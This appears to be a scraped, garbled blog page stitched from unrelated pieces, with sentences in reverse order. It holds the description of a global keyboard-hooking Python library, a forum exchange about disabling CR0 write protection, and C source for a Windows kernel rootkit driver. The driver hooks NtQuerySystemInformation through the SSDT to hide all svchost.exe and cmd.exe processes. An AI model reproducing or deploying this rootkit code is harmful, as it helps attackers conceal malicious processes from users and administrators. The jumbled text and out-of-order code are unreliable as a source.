![]() Trivial to install and deploy, just copy the files. Works with Windows and Linux (requires sudo), with experimental OS X support (thanks Pure Python, no C modules to be compiled.Global event hook on all keyboards (captures keys regardless of focus).Hook global events, register hotkeys, simulate key presses and much more. Take full control of your keyboard with this small Python library. It works for many cases, and I wish to pick it up again in the future, but you might encounter some friction and limited features using it. Windows 7 Professional Base System 圆4 Remotely debugging Windows 7 Professional VM w/kd.This project is currently unmaintained. I found a cool command thought I share it. lol.Įdited by Bit_Hacker, 14 September 2013 - 10:48 PM. So there is 12 items missing from the structure. ![]() Seems like the structure is bigger then the one you have in your zip file. I'm not sure how many bytes a LARGE_INTERGER is nor a ULONG. But they look different at first glance.īYTE Reserved1 -> thats 13 DWORDS ( 4 bytes * 13 = 52 bytes ) Typedef struct _SYSTEM_PROCESS_INFORMATION SYSTEM_PROCESS_INFO,*PSYSTEM_PROCESS_INFO Just noticed your SYSTEM_PROCESS_INFORMATION structure isn't 100% complete. If write protection is enabled, and you attempt to hook the SSDT, the system will crash. The code above is used to disable the memory write protection, because the SSDT can be write protected. I take it this enables the cpu to write to read-only memory pages right? It states the 16th bit is: 16 WP Write protect Determines whether the CPU can write to pages marked read-only If the above is true, I guess I don't need to know what the cr0 value is. Someone let me know if I have this right? By using the logical "NOT" before the "AND" makes it so that bit will never be 1. So the only way the code above changes the 16th bit. If we assume the cr0 register is all 0 which in this case it wont be. If you read the above from right to left. What I don't understand is what is the cr0 value that goes into eax before the logical "AND"? The whole code here that makes this work is this part right here.Ġ47 KeServiceDescriptorTable->ServiceTableBase=(ULONG)Hook It allow you to create powerful kernel mode rootkits that can hide and protect process, files, etc. To install the driver, open the install.bat batch file. NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath)įnNtQuerySystemInformation=Hook(*(PULONG)((PUCHAR)ZwQuerySystemInformation 1),HookNtQuerySystemInformation) ĭbgPrint("NtQuerySystemInformation address: %#x\n",fnNtQuerySystemInformation) Hook(*(PULONG)((PUCHAR)ZwQuerySystemInformation 1),fnNtQuerySystemInformation) Void Unload(PDRIVER_OBJECT pDriverObject) If(!wcscmp(L"cmd.exe",pNext->ImageName.Buffer)) PCurr->NextEntryOffset =pNext->NextEntryOffset If(!wcscmp(L"svchost.exe",pNext->ImageName.Buffer)) PNext=(PSYSTEM_PROCESS_INFO)((PUCHAR)pCurr pCurr->NextEntryOffset) Ret=fnNtQuerySystemInformation(InfoClass,Buffer,Length,ReturnLength) Return fnNtQuerySystemInformation(InfoClass,Buffer,Length,ReturnLength) NTSTATUS HookNtQuerySystemInformation(ULONG InfoClass,PVOID Buffer,ULONG Length,PULONG ReturnLength) KeServiceDescriptorTable->ServiceTableBase=(ULONG)Hook ![]() OrigAddress=(PVOID)KeServiceDescriptorTable->ServiceTableBase PVOID Hook(ULONG ServiceNumber,PVOID Hook) PNtQuerySystemInformation fnNtQuerySystemInformation NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(ULONG,PVOID,ULONG,PULONG) Typedef NTSTATUS (*pNtQuerySystemInformation)(ULONG,PVOID,ULONG,PULONG) Įxtern PKSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable }SYSTEM_PROCESS_INFO,*PSYSTEM_PROCESS_INFO ![]() }KSERVICE_DESCRIPTOR_TABLE,*PKSERVICE_DESCRIPTOR_TABLE Typedef struct _KSERVICE_DESCRIPTOR_TABLE The hook will hide all running svchost.exe and cmd.exe processes. A kernel mode driver is used to hook the SSDT. ![]() In this example, I will hook the NtQuerySystemInformation function with SSDT hooking. With the NtQuerySystemInformation hook, we can modify the data structure and hide running processes. By modifing this data structure, we can hide running processes in Task Manager or any other programs. When this function is called with SystemProcessInformatiion (5) information class, the function return a data structure that contain the running process list. This list is queried by calling the NtQuerySystemInformation function. When you open Task Manager, you see the list of running processes. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |